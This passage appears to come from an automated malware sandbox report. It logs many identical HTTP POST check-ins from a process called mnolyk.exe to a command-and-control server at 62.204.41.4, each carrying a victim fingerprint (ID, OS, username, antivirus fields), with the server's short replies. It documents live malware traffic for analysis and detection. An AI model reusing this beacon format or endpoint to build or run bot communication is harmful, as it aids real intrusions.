Feb 7, 2023 19:57:27.871680021 CET	275	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:27.936813116 CET	275	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
78	192.168.2.5	49785	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:28.117997885 CET	276	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:28.183651924 CET	276	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
79	192.168.2.5	49786	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:28.358001947 CET	277	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:28.421186924 CET	277	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.5	49705	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:06.909903049 CET	104	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:06.972677946 CET	104	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
80	192.168.2.5	49787	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:28.606188059 CET	278	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:28.670481920 CET	278	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
81	192.168.2.5	49788	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:28.836184978 CET	279	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:28.899353027 CET	279	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
82	192.168.2.5	49789	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:29.074929953 CET	280	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:29.140163898 CET	280	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
83	192.168.2.5	49790	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:29.323509932 CET	281	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:29.387468100 CET	281	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
84	192.168.2.5	49791	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:29.556150913 CET	282	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:29.620400906 CET	282	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
85	192.168.2.5	49792	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:29.791090965 CET	283	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:29.854423046 CET	283	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
86	192.168.2.5	49793	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:30.034311056 CET	284	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:30.099855900 CET	284	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
87	192.168.2.5	49794	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:30.288757086 CET	285	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:30.352380037 CET	285	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
88	192.168.2.5	49795	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:30.522001028 CET	286	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:30.586111069 CET	286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
89	192.168.2.5	49796	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:30.765230894 CET	287	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:30.831082106 CET	287	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49706	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:08.141498089 CET	105	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:08.205522060 CET	105	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
90	192.168.2.5	49797	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:31.010574102 CET	288	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:31.080058098 CET	288	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
91	192.168.2.5	49798	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:31.270025015 CET	289	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:31.334840059 CET	289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
92	192.168.2.5	49799	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:31.508215904 CET	290	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:31.572635889 CET	290	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
93	192.168.2.5	49800	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:31.745131016 CET	291	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:31.808176041 CET	291	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
94	192.168.2.5	49801	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:31.978610039 CET	292	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:32.041812897 CET	292	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
95	192.168.2.5	49802	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:32.212400913 CET	293	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:32.278455973 CET	293	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
96	192.168.2.5	49803	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 19:57:32.447940111 CET	294	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 36 32 32 35 38 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=562258&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 19:57:32.512260914 CET	294	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 18:57:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
